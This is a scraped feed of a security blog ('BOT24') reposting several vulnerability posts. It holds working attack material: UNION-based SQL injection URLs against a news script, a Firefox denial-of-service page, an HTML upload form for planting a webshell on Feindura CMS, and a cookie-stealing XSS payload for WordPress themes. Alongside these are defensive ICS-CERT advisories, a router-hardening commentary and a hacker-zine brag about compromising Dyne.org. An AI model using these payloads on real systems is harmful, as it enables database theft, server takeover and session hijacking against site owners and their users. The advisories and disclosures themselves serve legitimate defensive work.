Quantcast
Channel: BOT24
Viewing all 8064 articles
Browse latest View live

D-Link DIR-600 Wireless Router Vuln Commentary

$
0
0

While security vulnerabilies of the D-Link DIR-600 wireless router are known for quite a while, I am shocked to see that many of them are still in use (in Germany at least) and even *sold* (http://www.amazon.de/dp/B002GHTJ2A).

1. You can brute-force the WPA key using Reaver (https://code.google.com/p/reaver-wps/). The router implements WPS in a insecure way.
2. There is a default account. Username is "admin" and there is no password set up (http://www.helpowl.com/q/D-Link/DIR600/Troubleshooting/default-password-router/9416).
3. You can traverse the router's file system via vulnerable web scripts on the router.
4. The root account's user name and password are stored in clear text and can be read without problems.
5. The router's telnet server can be started using a vulnerable web script on the router.

Translation for not-so-tech-savvy folks: When using a DIR-600 for internet access, people can break into your network via wifi, piggyback on your internet connection and do stuff on the internet such as downloading pirated content or exchanging child pornography. If this gets pursued, you as the ISPs customer could be held liable for this because the action came from your ISP account. Additionally, people could tamper with your network, trick you into entering private data such as online banking credentials and much more. You do NOT want any of this.

D-Link had been informed in spring 2011 (http://www.spect.cl/blog/2011/12/d-link-dir-600-command-injection/) about points 3-5. Point 2 should have been known to them from the start. The WPS vulnerability became publicly known late 2011.

To my knowledge D-Link has neither released an updated firmware nor even warned customers of this security nightmare.

Wikipedia says (https://en.wikipedia.org/wiki/D-Link):

"In 2007, it was the leading networking company in the small to medium business (SMB) segment worldwide with 21.9% market share. In March 2008, it became the market leader in Wi-Fi product shipments worldwide, with 33% of the total market. In 2007, the company was featured in the "Info Tech 100", a listing of the world's best IT companies. It was also ranked as the 9th best IT company in the world for shareholder returns by BusinessWeek."

This is frightening to say the least. A company that specializes in networking hardware should not be so oblivious about the security of their products.

What to do?

1. Set up a password for the admin user. This does not fix the command injection vulnerability but it prevents attackers from gaining access to the router setup in the first place. Piggybacking would still be possible though (do not bother setting up MAC filters, these do NOT provide security -- http://www.techrepublic.com/blog/security/how-to-spoof-a-mac-address/395).

2. Install an alternative firmware, DD-WRT should be compatible (http://www.dd-wrt.com/wiki/index.php/DIR-600). If you do not know how to do this, either learn how to do it or replace the device with another router. AVM routers are quite popular in Germany and known to be secure. Their routers for example were among the few that were not affected by the WPS vulnerability (by default that is).



//The information contained within this publication is
//supplied "as-is"with no warranties or guarantees of fitness
//of use or otherwise. Bot24, Inc nor Bradley Sean Susser accepts
//responsibility for any damage caused by the use or misuse of
//this information


NEWSolved SQLi Vulnerability

$
0
0

SQLi:
http://127.0.0.1/newsscript.php?m=archive&topic_check=ok&idneu=-1' UNION SELECT 1,concat_ws(0x3a,version(),user(),database()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20--'

http://127.0.0.1/newsscript.php?mailto=ok&newsid=-1' UNION SELECT 1,2,concat_ws(0x3a,version(),user(),database()),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20--'

bSQLi:
http://127.0.0.1/newsscript.php?comments=ok&snews_id=1' AND 1=1--'

Greetz 2 fraggle




//The information contained within this publication is
//supplied "as-is"with no warranties or guarantees of fitness
//of use or otherwise. Bot24, Inc nor Bradley Sean Susser accepts
//responsibility for any damage caused by the use or misuse of
//this information

Mozilla Firefox 14.0.1 DoS Vulnerability

$
0
0

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>FF-14.0.1 DoS-Exploit by Know v3.0</title>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
<meta name="Description" content="FF-14.0.1 DoS-Exploit by Know v3.0" />

<script type="text/javascript" language="JavaScript">
var CrashIt = false;

if (typeof CrashIt != 'undefined')
{
CrashIt = new XMLHttpRequest();
}
if (!CrashIt)
{
try
{
CrashIt = new ActiveXObject("Msxml2.XMLHTTP");
}
catch(e)
{
try
{
CrashIt = new ActiveXObject("Microsoft.XMLHTTP");
}
catch(e)
{
CrashIt = null;
}
}
}

function load()
{
CrashIt.open('get','bla.php');
CrashIt.onreadystatechange = handleContent;
CrashIt.send(null);                  
return false;

}

function handleContent()
{

while(CrashIt.readyState != 4)
{
document.getElementById('inhalt').innerHTML = "pwnd";

}
document.getElementById('inhalt').innerHTML = CrashIt.responseText;

}

</script>


</head>
<body onload="load();">
<div id="inhalt"></div>

<body>
</html>




//The information contained within this publication is
//supplied "as-is"with no warranties or guarantees of fitness
//of use or otherwise. Bot24, Inc nor Bradley Sean Susser accepts
//responsibility for any damage caused by the use or misuse of
//this information

Feindura CMS v2.0.4

$
0
0
###
# Title : Feindura CMS v2.0.4 <= (thumbnail) File Upload Vulnerability
# Author : KedAns-Dz
# E-mail : ked-h (@hotmail.com / @1337day.com)
# Home : Hassi.Messaoud (30500) - Algeria -(00213555248701)
# FaCeb0ok : http://fb.me/Inj3ct0rK3d
# Friendly Sites : www.r00tw0rm.com * www.exploit-id.com
# Platform/CatID : php - 0day
# Type : Webapp - 0day
# Tested on : Windows7 (Fr) | Linux|BackTrack 5rc2
# Downlod : [http://sourceforge.net/projects/feindura/files/final%20releases/2.0.4/feindura.zip/download]
###

# <3 <3 Greetings t0 Palestine <3 <3
# Greetings To BarbarOS-Dz in the jail x_x ! F-ck HaCking, Lov3 Explo8ting

-->

<!--
# Description:
--------------
The Bug is 0day on Feindura CMS v2.0.4 when use Thumbnail to upload images
attacker can upload remote and big file/webShell (100mb) .gif to the target

# Directly Thumbnail uploader ex. : [http://127.0.0.1/feindura/library/views/windowBox/uploadPageThumbnail.php]
-----------------------------------

# upload Path :
---------------------
// sets the thumbnail UploadPath
$uploadPath = dirname(__FILE__).'/../../upload/thumbnails/';

--- thumbnailUpload.controller.php ( line 99-100 )
=> ex. [http://127.0.0.1/feindura/upload/thumbnails/
-->

<!-- # HTML Uploader P.O.C #-->
<form action="http://[target]/library/controllers/thumbnailUpload.controller.php" id="uploadPageThumbnailForm" enctype="multipart/form-data" method="post" onsubmit="startUploadAnimation();" target="uploadTargetFrame">
<input type="hidden" name="upload" value="true">
<input type="file" name="thumbFile" class="btn" style="width: 220px;">
<input type="submit" value="POST Data" class="button thumbnailUpload toolTipTop" title="Upload">
</form>

<!--
#============================[ Exploited By KedAns-Dz ]====================================
# Greets To : Dz Offenders Cr3w < Algerians HaCkerS > | Indoushka , Caddy-Dz , Kalashinkov3 , Mennouchi.Islem
# Jago-dz , Over-X , Kha&miX , Ev!LsCr!pT_Dz, KinG Of PiraTeS, TrOoN, T0xic, Chevr0sky, Black-ID, Barbaros-DZ,
# +> Greets To Inj3ct0r Operators Team : r0073r * Sid3^effectS * r4dc0re (1337day.com) * CrosS (r00tw0rm.com)
# Inj3ct0r Members 31337 : KedAns ^^ * KnocKout * SeeMe * Kalashinkov3 * ZoRLu * anT!-Tr0J4n * Angel Injection
# NuxbieCyber (www.1337day.com/team) * Dz Offenders Cr3w * Algerian Cyber Army * xDZx * HD Moore * YMCMB ..all
# Exploit-ID Team : jos_ali_joe + kaMtiEz + r3m1ck (exploit-id.com) * Milw0rm * KeyStr0ke * JF * L3b-r1Z * HMD
# packetstormsecurity.org * metasploit.com * r00tw0rm.com * OWASP Dz * Dis9-UE * All Security and Exploits Webs
#============================================================================================================ -->





//The information contained within this publication is
//supplied "as-is"with no warranties or guarantees of fitness
//of use or otherwise. Bot24, Inc nor Bradley Sean Susser accepts
//responsibility for any damage caused by the use or misuse of
//this information

CARLO GAVAZZI EOS-BOX MULTIPLE VULNERABILITIES

$
0
0

OVERVIEW
This advisory provides mitigation details for multiple vulnerabilities that impact the Carlo
Gavazzi EOS-Box Photovoltaic Monitoring System.
Carlo Gavazzi has identified two vulnerabilities in the Carlo Gavazzi EOS-Box Photovoltaic
Monitoring System. Carlo Gavazzi has produced a firmware update that fully resolves these
vulnerabilities. Successful exploitation of the vulnerabilities would allow an attacker to gain
unauthorized access, access private information, and execute remote code. This device is used in
the energy sector.
These vulnerabilities could be exploitable remotely. Exploits that target these vulnerabilities are
publicly available.
AFFECTED PRODUCTS
The following Carlo Gavazzi device with firmware version prior to 1.0.0.1080_2.1.10 is
affected:
• EOS-Box
IMPACT
Attackers could use the vulnerabilities to exploit the device by gaining unauthorized access in the
system, leaking stored information, and remotely executing code on the device. This could allow
a loss of availability, integrity, and confidentiality of the affected system. Carlo Gavazzi products
are widely used in industrial automation and energy systems. The energy sector is affected.
Impact to individual organizations depends on many factors that are unique to each organization.
ICS-CERT recommends that organizations evaluate the impact of these vulnerabilities based on
their operational environment, architecture, and product implementation.ICS-CERT Advisory ICSA-12-354-02 Page 2 of 4
BACKGROUND
Carlo Gavazzi Automation is a Italian-based company that maintains offices in several countries
around the world, including the United States.
The affected product, EOS-Box, is an embedded PC that supervises photovoltaic plants,
operating as an integrated control system. According to Carlo Gavazzi, the EOS-Box is deployed
across the renewable energy sector. Carlo Gavazzi estimates that these products are used
primarily in the United States, Canada, Europe, and Asia.
VULNERABILITY CHARACTERIZATION
VULNERABILITY OVERVIEW
HARD-CODED CREDENTIALS
a
The Carlo Gavazzi device stores hard-coded passwords in the PHP file of the device. By using
the hard-coded passwords, attackers can log into the device with administrative privileges. This
could allow the attacker to have unauthorized access.
CVE-2012-6428
b
has been assigned to this vulnerability. A CVSS v2 base score of 10.0 has been
assigned; the CVSS vector string is (AV:N/AC:L/Au:N/C:C/I:C/A:C).
c
SQL INJECTION
d
The Carlo Gavazzi device does not check the validity of the data before executing queries. By
accessing the SQL table of certain pages that do not require authentication, attackers can leak
information from the device. This could allow the attacker to compromise confidentiality.
CVE-2012-6427
e
has been assigned to this vulnerability. A CVSS v2 base score of 7.8 has been
assigned; the CVSS vector string is (AV:N/AC:L/Au:N/C:C/I:N/A:N).
f
                                                   
a. CWE,  http://cwe.mitre.org/data/definitions/259.html, CWE-259: Use of Hard-Coded Password, Web site last
accessed December 18, 2012.
b. NVD, http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2012-6428 , NIST uses this advisory to create the
CVE Web site report. This Web site will be active sometime after publication of this advisory.
c. CVSS Calculator, http://nvd.nist.gov/cvss.cfm?version=2&vector=(AV:N/AC:L/Au:N/C:C/I:C/A:C), Web site
last visited December 18, 2012.
d. CWE,  http://cwe.mitre.org/data/definitions/89.html, CWE-89: SQL Injection, Web site last accessed December
18, 2012.
e. NVD, http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2012-6427, NIST uses this advisory to create the
CVE Web site report. This Web site will be active sometime after publication of this advisory.ICS-CERT Advisory ICSA-12-354-02 Page 3 of 4
VULNERABILITY DETAILS
EXPLOITABILITY
These vulnerabilities could be exploitable remotely.
EXISTENCE OF EXPLOIT
Exploits that target these vulnerabilities are publicly available.
DIFFICULTY
An attacker with a low skill would be able to exploit these vulnerabilities.
MITIGATION
Carlo Gavazzi has developed a new firmware Version 1.0.0.1080_2.1.10 that mitigates these
vulnerabilities. Carlo Gavazzi released the new firmware Tuesday, December 18, 2012, directly
to the devices. Users will be able to manually download the firmware on their device by using
the Firmware Update function in the System Menu in the device’s Web interface.
ICS-CERT encourages asset owners to take additional defensive measures to protect against this
and other cybersecurity risks.
• Minimize network exposure for all control system devices. Critical devices should not
directly face the Internet.
• Locate control system networks and remote devices behind firewalls, and isolate them from
the business network.
• When remote access is required, use secure methods, such as Virtual Private Networks
(VPNs), recognizing that VPN is only as secure as the connected devices.
ICS-CERT also provides a section for control systems security recommended practices on the
ICS-CERT Web page. Several recommended practices are available for reading and download,
including Improving Industrial Control Systems Cybersecurity with Defense-in-Depth
Strategies.
g
ICS-CERT reminds organizations to perform proper impact analysis and risk
assessment prior to taking defensive measures.
                                                                                                                                                                         
f. CVSS Calculator, http://nvd.nist.gov/cvss.cfm?version=2&vector=(AV:N/AC:L/Au:N/C:C/I:N/A:N), Web site
last visited December 18, 2012.
g. CSSP Recommended Practices, http://www.us-cert.gov/control_systems/practices/Recommended_Practices.html,
Web site last accessed December 18, 2011.ICS-CERT Advisory ICSA-12-354-02 Page 4 of 4
Additional mitigation guidance and recommended practices are publicly available in the
ICS-CERT Technical Information Paper, ICS-TIP-12-146-01A—Targeted Cyber Intrusion
Detection and Mitigation Strategies,
h
www.ics-cert.org
that is available for download from the ICS-CERT Web
page ( ).
Organizations observing any suspected malicious activity should follow their established internal
procedures and report their findings to ICS-CERT for tracking and correlation against other
incidents.
ICS-CERT CONTACT
For any questions related to this report, please contact ICS-CERT at:
Email: ics-cert@hq.dhs.gov
Toll Free: 1-877-776-7585
For industrial control systems security information and incident reporting: www.ics-cert.org
ICS-CERT continuously strives to improve its products and services. You can help by answering
a short series of questions about this product at the following URL: https://forms.uscert.gov/ncsd-feedback/.
DOCUMENT FAQ
What is an ICS-CERT Advisory? An ICS-CERT Advisory is intended to provide awareness or
solicit feedback from critical infrastructure owners and operators concerning ongoing cyber
events or activity with the potential to impact critical infrastructure computing networks.
When is vulnerability attribution provided to researchers? Attribution for vulnerability
discovery is always provided to the vulnerability reporter unless the reporter notifies ICS-CERT
that they wish to remain anonymous. ICS-CERT encourages researchers to coordinate
vulnerability details before public release. The public release of vulnerability details prior to the
development of proper mitigations may put industrial control systems and the public at avoidable
risk.
                                                   
h. Targeted Cyber Intrusion Detection and Mitigation Strategies, http://www.us-cert.gov/control_systems/pdf/ICSTIP-12-146-01A.pdf, Web site last accessed Dec 18, 2012

Source link: http://www.us-cert.gov/control_systems/pdf/ICSA-12-354-02.pdf


RUGGEDCOM ROS HARD-CODED RSA SSL PRIVATE KEY

$
0
0

OVERVIEW
This advisory is a follow-up to the original alert titled ICS-ALERT-12-234-01A—KEY
MANAGEMENT ERRORS IN RUGGEDCOM’S RUGGED OPERATING SYSTEM
a
Independent researcher Justin W. Clarke of Cylance Inc., has identified the use of hard-coded
RSA SSL private key in RuggedCom’s Rugged Operating System (ROS). RuggedCom, an
independent subsidiary of Siemens, has produced a new version of the ROS that mitigates this
vulnerability.
that was
published August 31, 2012, on the ICS-CERT Web page.
This vulnerability could be exploited remotely. Exploits that target this vulnerability are publicly
available.
AFFECTED PRODUCTS
The following RuggedCom products
b,c
• Rugged OS, ver. 3.11 and prior
are affected:
• ROX I OS firmware used by RX1000 and RX1100 series products. ROX I versions before
and including ROX v1.14.5
• ROX II OS firmware used by RX5000 and RX1500 series products. ROX II versions before
and including ROX v2.3.0
                                                   
a. ICS-CERT Alert, https://www.us-cert.gov/control_systems/pdf/ICS-ALERT-12-234-01A.pdf. Web site last
accessed December 18, 2012.
b. RuggedCom Website, http://www.ruggedcom.com/productbulletin/ros-security-page/. Web site last accessed
December 18, 2012.
c. Siemens Security Advisory, https://www.siemens.com/corporatetechnology/pool/de/forschungsfelder/siemens_security_advisory_ssa-622607.pdf. Web site last accessed
December 18, 2012.ICS-CERT Advisory ICSA-12-354-01 Page 2 of 5
• RuggedMax Operating System Firmware used by the Win7000 and Win7200 base station
units and the Win5100 and Win5200 subscriber (CPE) devices. All versions of the firmware
released before and including 4.2.1.4621.22
IMPACT
The impact of exploiting this vulnerability will give an attacker the private SSL key for secure
communications between client/user and a RuggedCom switch. The attacker can use the key to
decrypt management traffic and create malicious communication to the RuggedCom network
device.
This vulnerability has no impact on encrypted data traffic passing through RuggedCom ROS,
ROX, or RuggedMax BS devices.
Impact to individual organizations depends on many factors that are unique to each organization.
ICS-CERT recommends that organizations evaluate the impact of this vulnerability based on
their operational environment, architecture, and product implementation.
BACKGROUND
RuggedCom, a Siemens Business, is a Canadian-based company with sales and distribution in
over 25 countries around the world.
The affected product, Rugged Operating System (ROS) is the software operating system for
RuggedSwitch and RuggedServer product families. ROS based devices are often deployed in
critical infrastructure projects such as electrical substations, intelligent transportation systems,
and rail wayside control.
RuggedCom/Siemens estimates that these products are used primarily in Canada, United States,
Mexico, China, and Europe.
VULNERABILITY CHARACTERIZATION
VULNERABILITY OVERVIEW
KEY MANAGEMENT ERRORS
d
Using publicly available software, the private SSL key can be extracted from the ROS binary file.
This key can allow an attacker to establish a secure communication link with RuggedCom
network devices and manipulate settings that would result in a denial of service condition.
                                                   
d. CWE, http://cwe.mitre.org/data/definitions/320.html, CWE-320: Key Management Errors. Web site last accessed
December 18, 2012.ICS-CERT Advisory ICSA-12-354-01 Page 3 of 5
CVE-2012-4698
e
has been assigned to this vulnerability. A CVSS v2 base score of 9.3 has been
assigned; the CVSS vector string is (AV:N/AC:M/Au:N/C:C/I:C/A:C).
f
VULNERABILITY DETAILS
EXPLOITABILITY
This vulnerability could be exploited remotely.
EXISTENCE OF EXPLOIT
Exploits that target this vulnerability are publicly available.
DIFFICULTY
An attacker with a moderate skill would be able to exploit this vulnerability.
MITIGATION
ROS DEVICES
An update can be obtained from RuggedCom’s Customer Support Team. Additional information
is available on the RuggedCom homepage
g
ROX DEVICES
.
ROX device customers are strongly encouraged to change their SSL and SSH keys. Application
notes exist that explain how to change the SSL and SSH keys. Please consult App Note AN17
for ROX1.x versions of the firmware and App Note AN16 for ROX 2.x. These application notes
can be obtained from RuggedCom’s Customer Support Team.
                                                   
e. NVD, http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2012-4698. NIST uses this advisory to create the
CVE Web site report. This Web site will be active sometime after publication of this advisory.
f. CVSS Calculator, http://nvd.nist.gov/cvss.cfm?version=2&vector=(AV:N/AC:M/Au:N/C:C/I:C/A:C). Web site
last accessed December 18, 2012.
g
RuggedCom Website, http://www.ruggedcom.com/productbulletin/ros-security-page/. Web site last accessed
December 18, 2012.ICS-CERT Advisory ICSA-12-354-01 Page 4 of 5
RUGGEDMAX DEVICES
SSH SERVICE
For RuggedMax SSH service, the customer has the capability to generate new keys. Each device
(subscriber or base station) can be triggered to generate a new SSH key by deleting the current
key. Customers are strongly encouraged to generate new keys. A procedure on how to generate a
new SSH key can be obtained from RuggedCom Customer Support Team.
HTTPS/SSL SERVICE
For the HTTPS access, a temporary solution exists with the current version of firmware to
disable HTTPS access. For details on this procedure please contact the RuggedCom Customer
Support Team.
Siemens recommendations the following mitigation strategies when deploying RuggedCom
devices:
• Do not connect ROS, RuggedMax devices directly to an untrusted network such as the
Internet.
• Establish a VPN solution to connect to an untrusted network such as the Internet.
• Check for any signs of unauthorized access to a device (e.g., by reviewing syslogs).
• Use industry best practices for security such as those defined by NERC-CIP.
ICS-CERT encourages asset owners to take additional defensive measures to protect against this
and other cybersecurity risks.
• Minimize network exposure for all control system devices. Critical devices should not
directly face the Internet.
• Locate control system networks and remote devices behind firewalls, and isolate them from
the business network.
• When remote access is required, use secure methods, such as Virtual Private Networks
(VPNs), recognizing that VPN is only as secure as the connected devices.
ICS-CERT also provides a section for control systems security recommended practices on the
ICS-CERT Web page. Several recommended practices are available for reading and download,
including Improving Industrial Control Systems Cybersecurity with Defense-in-Depth ICS-CERT Advisory ICSA-12-354-01 Page 5 of 5
Strategies.
h
Additional mitigation guidance and recommended practices are publicly available in the
ICS-CERT Technical Information Paper, ICS-TIP-12-146-01A—Targeted Cyber Intrusion
Detection and Mitigation Strategies,
ICS-CERT reminds organizations to perform proper impact analysis and risk
assessment prior to taking defensive measures.
i
www.ics-cert.org
that is available for download from the ICS-CERT Web
page ( ).
Organizations observing any suspected malicious activity should follow their established internal
procedures and report their findings to ICS-CERT for tracking and correlation against other
incidents.
ICS-CERT CONTACT
For any questions related to this report, please contact ICS-CERT at:
Email: ics-cert@hq.dhs.gov
Toll Free: 1-877-776-7585
For industrial control systems security information and incident reporting: www.ics-cert.org
ICS-CERT continuously strives to improve its products and services. You can help by answering
a short series of questions about this product at the following URL: https://forms.uscert.gov/ncsd-feedback/.
DOCUMENT FAQ
What is an ICS-CERT Advisory? An ICS-CERT Advisory is intended to provide awareness or
solicit feedback from critical infrastructure owners and operators concerning ongoing cyber
events or activity with the potential to impact critical infrastructure computing networks.
When is vulnerability attribution provided to researchers? Attribution for vulnerability
discovery is always provided to the vulnerability reporter unless the reporter notifies ICS-CERT
that they wish to remain anonymous. ICS-CERT encourages researchers to coordinate
vulnerability details before public release. The public release of vulnerability details prior to the
development of proper mitigations may put industrial control systems and the public at avoidable
risk.
                                                   
h. CSSP Recommended Practices, http://www.us-cert.gov/control_systems/practices/Recommended_Practices.html.
Web site last accessed December 18, 2012.
i. Targeted Cyber Intrusion Detection and Mitigation Strategies, http://www.us-cert.gov/control_systems/pdf/ICSTIP-12-146-01A.pdf. Web site last accessed December 18, 2012.


Source link: http://www.us-cert.gov/control_systems/pdf/ICSA-12-354-01.pdf

Multiple vulnerabilities in multiple themes for WordPress

$
0
0

Some time ago, when I've found vulnerabilities in plugin BuddyPress for
WordPress (particularly in Affinity BuddyPress theme for it) with Rokbox,
which I disclosed earlier, I also found multiple vulnerable themes for WP
with Rokbox.

So I want to warn you about multiple vulnerabilities in multiple themes for
WordPress. These are themes developed by Rokbox's developers. And they put
Rokbox (with JW Player, but without TimThumb) into their themes.

These are Content Spoofing, Cross-Site Scripting, Full path disclosure and
Information Leakage vulnerabilities. I've disclosed vulnerabilities in JW
Player in June and August (including in commercial version JW Player Pro)
and disclosed vulnerabilities in Rokbox in December. These vulnerabilities
are similar to vulnerabilities in Affinity BuddyPress theme. Also I've found
many WP themes by other developers with Rokbox, but I'd write about them
separately, because they have much more holes.

-------------------------
Affected products:
-------------------------

Vulnerable are all WordPress themes by RocketTheme (during quick research I
found 16 themes for WP, in addition to above-mentioned theme for BP, but I
supposed all their themes contain Rokbox with JW Player 4.4.198). They
haven't removed this vulnerable version of JW Player from Rokbox and so from
any of their themes (for WP and BP), when I've informed them in August.

Here are these 16 vulnerable themes, which I found:

rt_afterburner_wp
rt_refraction_wp
rt_solarsentinel_wp
rt_mixxmag_wp (Mixxmag)
rt_iridium_wp
rt_infuse_wp (infuse)
rt_perihelion_wp
rt_replicant2_wp
rt_affinity_wp
rt_nexus_wp
rt_sentinel
rt_mynxx_wp_vestnikp
rt_mynxx_wp (rt.mynxx.wp)
rt_moxy_wp
rt_terrantribune_wp
rt_meridian_wp

They will be added to those 94 vulnerable themes for WordPress, in which
I've found vulnerabilities (http://websecurity.com.ua/4915/).

In Google's index there are now up to 634000 pages with Rokbox at WP sites.
So there are a lot of vulnerable themes and web sites with these themes.

----------
Details:
----------

The paths for these themes are the next:

http://site/wordpress/wp-content/themes/rt_afterburner_wp/js/rokbox/jwplayer/jwplayer.swf

http://site/wordpress/wp-content/themes/rt_refraction_wp/js/rokbox/jwplayer/jwplayer.swf

http://site/wordpress/wp-content/themes/rt_solarsentinel_wp/js/rokbox/jwplayer/jwplayer.swf

http://site/wordpress/wp-content/themes/rt_mixxmag_wp/js/rokbox/jwplayer/jwplayer.swf
http://site/wordpress/wp-content/themes/Mixxmag/js/rokbox/jwplayer/jwplayer.swf

http://site/wordpress/wp-content/themes/rt_iridium_wp/js/rokbox/jwplayer/jwplayer.swf

http://site/wordpress/wp-content/themes/rt_infuse_wp/js/rokbox/jwplayer/jwplayer.swf
http://site/wordpress/wp-content/themes/infuse/js/rokbox/jwplayer/jwplayer.swf

http://site/wordpress/wp-content/themes/rt_perihelion_wp/js/rokbox/jwplayer/jwplayer.swf

http://site/wordpress/wp-content/themes/rt_replicant2_wp/js/rokbox/jwplayer/jwplayer.swf

http://site/wordpress/wp-content/themes/rt_affinity_wp/js/rokbox/jwplayer/jwplayer.swf

http://site/wordpress/wp-content/themes/rt_nexus_wp/js/rokbox/jwplayer/jwplayer.swf

http://site/wordpress/wp-content/themes/rt_sentinel/js/rokbox/jwplayer/jwplayer.swf

http://site/wordpress/wp-content/themes/rt_mynxx_wp_vestnikp/js/rokbox/jwplayer/jwplayer.swf

http://site/wordpress/wp-content/themes/rt_mynxx_wp/js/rokbox/jwplayer/jwplayer.swf
http://site/wordpress/wp-content/themes/rt.mynxx.wp/js/rokbox/jwplayer/jwplayer.swf

http://site/wordpress/wp-content/themes/rt_moxy_wp/js/rokbox/jwplayer/jwplayer.swf

http://site/wordpress/wp-content/themes/rt_terrantribune_wp/js/rokbox/jwplayer/jwplayer.swf

http://site/wordpress/wp-content/themes/rt_meridian_wp/js/rokbox/jwplayer/jwplayer.swf

Content Spoofing (WASC-12):

In parameter file there can be set as video, as audio files.

Swf-file of JW Player accepts arbitrary addresses in parameters file and
image, which allows to spoof content of flash - i.e. by setting addresses of
video (audio) and/or image files from other site.

http://site/wordpress/wp-content/themes/rt_afterburner_wp/js/rokbox/jwplayer/jwplayer.swf?file=1.flv&backcolor=0xFFFFFF&screencolor=0xFFFFFF
http://site/wordpress/wp-content/themes/rt_afterburner_wp/js/rokbox/jwplayer/jwplayer.swf?file=1.flv&image=1.jpg

Content Spoofing (WASC-12):

Swf-file of JW Player accepts arbitrary addresses in parameter config, which
allows to spoof content of flash - i.e. by setting address of config file
from other site (parameters file and image in xml-file accept arbitrary
addresses). For loading of config file from other site it needs to have
crossdomain.xml.

http://site/wordpress/wp-content/themes/rt_afterburner_wp/js/rokbox/jwplayer/jwplayer.swf?config=1.xml

1.xml

<config>
  <file>1.flv</file>
  <image>1.jpg</image>
</config>

Content Spoofing (WASC-12):

http://site/wordpress/wp-content/themes/rt_afterburner_wp/js/rokbox/jwplayer/jwplayer.swf?abouttext=Player&aboutlink=http://site

XSS (WASC-08):

http://site/wordpress/wp-content/themes/rt_afterburner_wp/js/rokbox/jwplayer/jwplayer.swf?abouttext=Player&aboutlink=data:text/html;base64,PHNjcmlwdD5hbGVydChkb2N1bWVudC5jb29raWUpPC9zY3JpcHQ%2B

Full path disclosure (WASC-13):

In all these themes there is FPD in index.php
(http://site/wordpress/wp-content/themes/rt_afterburner_wp/ and the same for
other themes), which works at default PHP settings. Also potentially there
are FPD in other php-files of these themes.

Information Leakage (WASC-13):

There are sites with rt_mixxmag_wp theme, which have error log with full
paths.

http://site/wordpress/wp-content/themes/rt_mixxmag_wp/js/rokbox/error_log

------------
Timeline:
------------

2012.05.29 - informed developers of JW Player.
2012.06.06 - disclosed at my site about JW Player.
2012.08.18 - informed developers about new holes in JW Player Pro.
2012.08.23 - disclosed at my site about JW Player Pro.
2012.08.28 - informed developers of Rokbox.
2012.12.14 - disclosed at my site about Rokbox.
2012.12.23 - disclosed to the lists about multiple themes for WordPress with
Rokbox.

Best wishes & regards,
MustLive
Administrator of Websecurity web site
http://websecurity.com.ua




//The information contained within this publication is
//supplied "as-is"with no warranties or guarantees of fitness
//of use or otherwise. Bot24, Inc nor Bradley Sean Susser accepts
//responsibility for any damage caused by the use or misuse of
//this information


EGO[0]Zine Permeating IRC- Dyne.org (the people who make the Dyne_Bolic OS) Hacked (PoC)

$
0
0

As always this information is for education purposes. We show these compromised systems so that you understand the current threat environment that surrounds us everyday and how significant it is to take the appropriate countermeasures to safeguard your critical data no matter what size your organization is as well as your individual data driven devices. Below is POC of the attack. Again as always be proactive not reactive in safeguarding your critical data and stay safe out there. Subsequently as you are aware this blog is provided to the public to offer education in the area of IT security, creating awareness and increasing collaboration so you can implement the appropriate countermeasures such as those described in ISO13335 to prevent yourselves from becoming victims in the current threat environment,
The exploit is provided below as I will continue to monitor the net to safeguard systems and individuals critical data. Additionally this information is provided to our readers as an addendum to the California Database Security Breach Act.

Brief Description of dyne :bolic


dyne:bolic is a live CD/DVD based on the Linux kernel with a focus on multimedia production,and is distributed with a large assortment of applications for audio and video manipulation. Termed "Rastasoft" by its author, dyne:bolic is based entirely on free software, and is recognized by the GNU Project for this characteristic. It is designed and optimized for older and slower computers, turning them into full media stations: this is why the software in it is often not at the newest version available. The result is that the minimum needed is a Pentium1 or K5 PC with only 64 MB RAM and an IDE CD-ROM, or an Xbox game console. Multiple Xbox installations can be clustered. Latest version is 3.0.0, codename MUNIR, released on September 8, 2011 (wikipedia)


EEEEEEEEEEEEEEEEEEEEEE       GGGGGGGGGGGGG     OOOOOOOOO  
E::::::::::::::::::::E    GGG::::::::::::G   OO:::::::::OO
E::::::::::::::::::::E  GG:::::::::::::::G OO:::::::::::::OO
EE::::::EEEEEEEEE::::E G:::::GGGGGGGG::::GO:::::::OOO:::::::O
  E:::::E       EEEEEEG:::::G       GGGGGGO::::::O   O::::::O
  E:::::E            G:::::G              O:::::O     O:::::O
  E::::::EEEEEEEEEE  G:::::G              O:::::O     O:::::O
  E:::::::::::::::E  G:::::G    GGGGGGGGGGO:::::O     O:::::O
  E:::::::::::::::E  G:::::G    Gantisec`GO:::::O     O:::::O
  E::::::EEEEEEEEEE  G:::::G    GGGGG::::GO:::::O     O:::::O
  E:::::E            G:::::G        G::::GO:::::O     O:::::O
  E:::::E       EEEEEEG:::::G       G::::GO::::::O   O::::::O
EE::::::EEEEEEEE:::::E G:::::GGGGGGGG::::GO:::::::OOO:::::::O
E::::::::::::::::::::E  GG:::::::::::::::G OO:::::::::::::OO
E::::::::::::::::::::E    GGG::::::GGG:::G   OO:::::::::OO
EEEEEEEEEEEEEEEEEEEEEE       GGGGGG   GGGG     OOOOOOOOO  
    Everyone                  Gets              Owned

@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
                                                         
      ___________________   ___________________
  .-/|  rm   ~~**~~      \ /      ~~**~~   rf  |\-.
  ||||                    :                    ||||
  ||||     Starring:      :                    ||||
  ||||      Dyne.org      : In Loving Memory   ||||
  ||||                    :        of          ||||
  ||||                    :                    ||||
  ||||     Producer:      :   ac1db1tch3z      ||||
  ||||   Indiana Pwnz     :      h0no          ||||
  ||||    Productionz     : phrack high council||||
  ||||                    :     2chainz        ||||
  ||||     Direktorz:     :     dikline        ||||
  ||||   enzo n semtex    :       el8          ||||
  ||||___________________ : ___________________||||
  ||/====================\:/====================\||
  `---------------------~___~--------------------''


we r ackepting submissionz for the next zine. plz send yer hax to
